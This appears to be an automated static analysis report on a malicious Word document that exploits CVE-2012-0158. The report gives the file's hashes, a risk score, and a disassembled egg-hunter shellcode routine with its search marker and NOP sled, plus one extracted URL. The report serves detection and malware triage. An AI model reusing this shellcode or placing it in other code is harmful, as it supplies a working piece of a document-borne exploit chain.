Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 01cbbff86fb7b4bf…

MALICIOUS

Office (OLE)

48.5 KB Created: 2011-04-06 07:47:00 Authoring application: Microsoft Office Word First seen: 2015-10-06
MD5: b493941450b2e46a9c55c11c97d60be0 SHA-1: 6702cb47ed58ad12530e62f27a10f80455f7e7a8 SHA-256: 01cbbff86fb7b4bf593927d7c943e7c3c61719c7d0adfb318a7721c8812cec9a
82 Risk Score

Heuristics 3

  • MSCOMCTL.ListView — CVE-2012-0158 high CVE likely CVE_2012_0158
    MSCOMCTL.ListView — CVE-2012-0158
  • Egg-hunter shellcode pattern high SC_EGG_HUNTER
    Egg-hunter shellcode pattern
    Disassembly
    x86 disassembly · validity: code (1.0) — 3/3 branch targets land on an instruction boundary (100% coherence)
    000068AC  6681caff0f        or dx, 0xfff
    000068B1  42                inc edx
    000068B2  83c27c            add edx, 0x7c
    000068B5  52                push edx
    000068B6  6a02              push 2
    000068B8  58                pop eax
    000068B9  cd2e              int 0x2e
    000068BB  3c05              cmp al, 5
    000068BD  5a                pop edx
    000068BE  74ec              je 0x68ac
    000068C0  b841904190        mov eax, 0x90419041
    000068C5  89d7              mov edi, edx
    000068C7  af                scasd eax, dword ptr es:[edi]
    000068C8  75e8              jne 0x68b2
    000068CA  af                scasd eax, dword ptr es:[edi]
    000068CB  75e5              jne 0x68b2
    000068CD  ffe7              jmp edi
    000068CF  90                nop
    000068D0  90                nop
    000068D1  90                nop
    000068D2  90                nop
    000068D3  90                nop
    000068D4  90                nop
    000068D5  90                nop
    000068D6  90                nop
    000068D7  90                nop
    000068D8  90                nop
    000068D9  90                nop
    000068DA  42                inc edx
    000068DB  004200            add byte ptr [edx], al
    000068DE  42                inc edx
    000068DF  004200            add byte ptr [edx], al
    000068E2  42                inc edx
    000068E3  004200            add byte ptr [edx], al
    000068E6  42                inc edx
    000068E7  004200            add byte ptr [edx], al
    000068EA  42                inc edx
    000068EB  004200            add byte ptr [edx], al
    000068EE  42                inc edx
    000068EF  004200            add byte ptr [edx], al
    000068F2  42                inc edx
    000068F3  004200            add byte ptr [edx], al
    000068F6  42                inc edx
    000068F7  004200            add byte ptr [edx], al
    000068FA  42                inc edx
    000068FB  004200            add byte ptr [edx], al
    000068FE  42                inc edx
    000068FF  004200            add byte ptr [edx], al
    00006902  42                inc edx
    00006903  004200            add byte ptr [edx], al
    00006906  42                inc edx
    00006907  004200            add byte ptr [edx], al
    0000690A  42                inc edx
    0000690B  00                .byte 0x00
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.euskonews.com/0573zbk/gaia57301es.html In document text (OLE body)